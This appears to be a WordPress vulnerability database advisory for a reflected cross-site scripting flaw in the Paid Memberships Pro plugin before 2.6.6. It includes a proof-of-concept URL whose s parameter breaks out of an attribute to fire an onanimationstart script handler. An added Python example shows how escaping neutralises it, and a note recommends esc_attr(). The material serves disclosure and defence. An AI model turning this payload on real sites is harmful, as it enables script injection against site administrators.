wpexploit | JrXnm | WPEX-ID:FC011990-4EC1-4553-901D-4FF1F482CB79
History: Nov 23, 2021 - 12:00 a.m.

Paid Memberships Pro < 2.6.6 - Reflected Cross-Site Scripting

EPSS: 0.001 Low, Percentile: 41.5%

The plugin does not escape the s parameter before outputting it back in an attribute in an admin page, leading to Reflected Cross-Site Scripting.

https://example.com/wp-admin/admin.php?page=pmpro-discountcodes&s=s"+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
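Why the double quote in the s value matters, shown as an added example (not the plugin's code): the two render functions are hypothetical templates that reflect s into a double-quoted value attribute, once as-is and once with attribute-context escaping, and an HTML parser then reports which attributes the input element ends up with.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# PoC URL quoted from the advisory above (example.com is its placeholder host).
POC_URL = ('https://example.com/wp-admin/admin.php?page=pmpro-discountcodes'
           '&s=s"+style=animation-name:rotation+onanimationstart=alert(/XSS/)//')


def search_term(url):
    """Decode the s query parameter as a server would ('+' becomes a space)."""
    return parse_qs(urlsplit(url).query)["s"][0]


def render_unescaped(s):
    # Hypothetical template: the value is reflected into the attribute as-is.
    return '<input type="text" name="s" value="' + s + '">'


def render_escaped(s):
    # Attribute-context escaping: ", ', <, > and & are emitted as entities.
    return '<input type="text" name="s" value="' + escape(s, quote=True) + '">'


class InputAttrs(HTMLParser):
    """Collect the attributes an HTML parser sees on the first <input> tag."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.attrs is None:
            self.attrs = dict(attrs)


def parsed_attrs(markup):
    parser = InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.attrs


def injected_attrs(markup, expected=("type", "name", "value")):
    """Attribute names present in the parsed tag that the template never emits."""
    return sorted(set(parsed_attrs(markup)) - set(expected))


if __name__ == "__main__":
    term = search_term(POC_URL)
    print("unescaped:", injected_attrs(render_unescaped(term)))
    print("escaped:  ", injected_attrs(render_escaped(term)))
```

In WordPress PHP code the attribute-context escaper is esc_attr(); the same check can be used as a regression test by asserting that no attribute beyond the expected set appears for any reflected value.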
